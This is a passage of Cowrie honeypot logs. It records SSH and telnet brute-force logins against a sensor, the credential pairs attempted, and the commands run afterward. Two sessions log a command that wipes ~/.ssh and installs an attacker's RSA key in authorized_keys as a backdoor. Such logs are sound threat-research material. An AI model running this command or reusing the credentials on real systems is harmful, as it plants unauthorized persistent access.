03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:34:22.053343Z","src_ip":"213.6.203.226","session":"718a5ca24a77"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:34:22.362017Z","src_ip":"213.6.203.226","session":"718a5ca24a77"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:34:22.430227Z","src_ip":"213.6.203.226","session":"c27af2ac40e7"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:34:22.431105Z","src_ip":"213.6.203.226","session":"718a5ca24a77"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59188,"dst_ip":"1.2.3.4","dst_port":22,"session":"5859453e146e","protocol":"ssh","message":"New connection: 212.227.235.229:59188 (1.2.3.4:22) [session: 5859453e146e]","sensor":"my-vps","timestamp":"2025-09-09T05:34:28.472907Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:34:28.473811Z","src_ip":"212.227.235.229","session":"5859453e146e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:34:28.648363Z","src_ip":"212.227.235.229","session":"5859453e146e"}
{"eventid":"cowrie.login.failed","username":"mithun","password":"mithun","message":"login attempt [mithun/mithun] failed","sensor":"my-vps","timestamp":"2025-09-09T05:34:29.394652Z","src_ip":"212.227.235.229","session":"5859453e146e"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:34:30.571048Z","src_ip":"212.227.235.229","session":"5859453e146e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46564,"dst_ip":"1.2.3.4","dst_port":23,"session":"3b9f77ddd1d7","protocol":"telnet","message":"New connection: 212.227.125.160:46564 (1.2.3.4:23) [session: 3b9f77ddd1d7]","sensor":"my-vps","timestamp":"2025-09-09T05:34:35.777449Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:34:35.865532Z","src_ip":"212.227.125.160","session":"3b9f77ddd1d7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:34:35.915789Z","src_ip":"212.227.125.160","session":"3b9f77ddd1d7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40632,"dst_ip":"1.2.3.4","dst_port":22,"session":"f28295aea558","protocol":"ssh","message":"New connection: 212.227.235.229:40632 (1.2.3.4:22) [session: f28295aea558]","sensor":"my-vps","timestamp":"2025-09-09T05:34:49.681451Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:34:49.683228Z","src_ip":"212.227.235.229","session":"f28295aea558"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:34:49.762167Z","src_ip":"212.227.235.229","session":"f28295aea558"}
{"eventid":"cowrie.login.failed","username":"init","password":"password123","message":"login attempt [init/password123] failed","sensor":"my-vps","timestamp":"2025-09-09T05:34:50.116802Z","src_ip":"212.227.235.229","session":"f28295aea558"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:34:51.197552Z","src_ip":"212.227.235.229","session":"f28295aea558"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48922,"dst_ip":"1.2.3.4","dst_port":22,"session":"2495c96154b2","protocol":"ssh","message":"New connection: 212.227.235.229:48922 (1.2.3.4:22) [session: 2495c96154b2]","sensor":"my-vps","timestamp":"2025-09-09T05:35:10.762934Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:35:10.763912Z","src_ip":"212.227.235.229","session":"2495c96154b2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:35:11.077103Z","src_ip":"212.227.235.229","session":"2495c96154b2"}
{"eventid":"cowrie.login.success","username":"root","password":"roottoor","message":"login attempt [root/roottoor] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:35:12.368985Z","src_ip":"212.227.235.229","session":"2495c96154b2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:35:13.049322Z","src_ip":"212.227.235.229","session":"2495c96154b2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:35:13.050076Z","src_ip":"212.227.235.229","session":"2495c96154b2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:35:13.051182Z","src_ip":"212.227.235.229","session":"2495c96154b2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:35:13.364053Z","src_ip":"212.227.235.229","session":"2495c96154b2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:35:14.004593Z","src_ip":"212.227.235.229","session":"2495c96154b2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:35:14.005401Z","src_ip":"212.227.235.229","session":"2495c96154b2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:35:14.322156Z","src_ip":"212.227.235.229","session":"2495c96154b2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:35:14.323500Z","src_ip":"212.227.235.229","session":"2495c96154b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49854,"dst_ip":"1.2.3.4","dst_port":22,"session":"86baa2909975","protocol":"ssh","message":"New connection: 212.227.235.229:49854 (1.2.3.4:22) [session: 86baa2909975]","sensor":"my-vps","timestamp":"2025-09-09T05:35:14.625684Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:35:14.626626Z","src_ip":"212.227.235.229","session":"86baa2909975"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:35:14.933900Z","src_ip":"212.227.235.229","session":"86baa2909975"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:35:16.209926Z","src_ip":"212.227.235.229","session":"86baa2909975"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:35:17.521916Z","src_ip":"212.227.235.229","session":"86baa2909975"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50568,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa294cdb0ca5","protocol":"ssh","message":"New connection: 212.227.235.229:50568 (1.2.3.4:22) [session: aa294cdb0ca5]","sensor":"my-vps","timestamp":"2025-09-09T05:35:17.817411Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:35:17.819561Z","src_ip":"212.227.235.229","session":"aa294cdb0ca5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:35:18.118370Z","src_ip":"212.227.235.229","session":"aa294cdb0ca5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:35:19.325010Z","src_ip":"212.227.235.229","session":"aa294cdb0ca5"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:35:19.628944Z","src_ip":"212.227.235.229","session":"aa294cdb0ca5"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:35:19.634846Z","src_ip":"212.227.235.229","session":"2495c96154b2"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":42253,"dst_ip":"1.2.3.4","dst_port":22,"session":"09dedfb5ae70","protocol":"ssh","message":"New connection: 213.6.203.226:42253 (1.2.3.4:22) [session: 09dedfb5ae70]","sensor":"my-vps","timestamp":"2025-09-09T05:35:23.800903Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:35:23.801768Z","src_ip":"213.6.203.226","session":"09dedfb5ae70"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:35:23.870127Z","src_ip":"213.6.203.226","session":"09dedfb5ae70"}
{"eventid":"cowrie.login.success","username":"root","password":"1@Asdfghjk","message":"login attempt [root/1@Asdfghjk] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:35:24.183880Z","src_ip":"213.6.203.226","session":"09dedfb5ae70"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:35:24.382226Z","src_ip":"213.6.203.226","session":"09dedfb5ae70"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:35:24.382915Z","src_ip":"213.6.203.226","session":"09dedfb5ae70"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:35:24.383631Z","src_ip":"213.6.203.226","session":"09dedfb5ae70"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:35:24.452935Z","src_ip":"213.6.203.226","session":"09dedfb5ae70"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:35:24.653328Z","src_ip":"213.6.203.226","session":"09dedfb5ae70"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:35:24.654020Z","src_ip":"213.6.203.226","session":"09dedfb5ae70"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:35:24.724817Z","src_ip":"213.6.203.226","session":"09dedfb5ae70"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:35:24.725711Z","src_ip":"213.6.203.226","session":"09dedfb5ae70"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":35267,"dst_ip":"1.2.3.4","dst_port":22,"session":"f34215a4136a","protocol":"ssh","message":"New connection: 213.6.203.226:35267 (1.2.3.4:22) [session: f34215a4136a]","sensor":"my-vps","timestamp":"2025-09-09T05:35:24.791266Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:35:24.792142Z","src_ip":"213.6.203.226","session":"f34215a4136a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:35:24.859883Z","src_ip":"213.6.203.226","session":"f34215a4136a"}
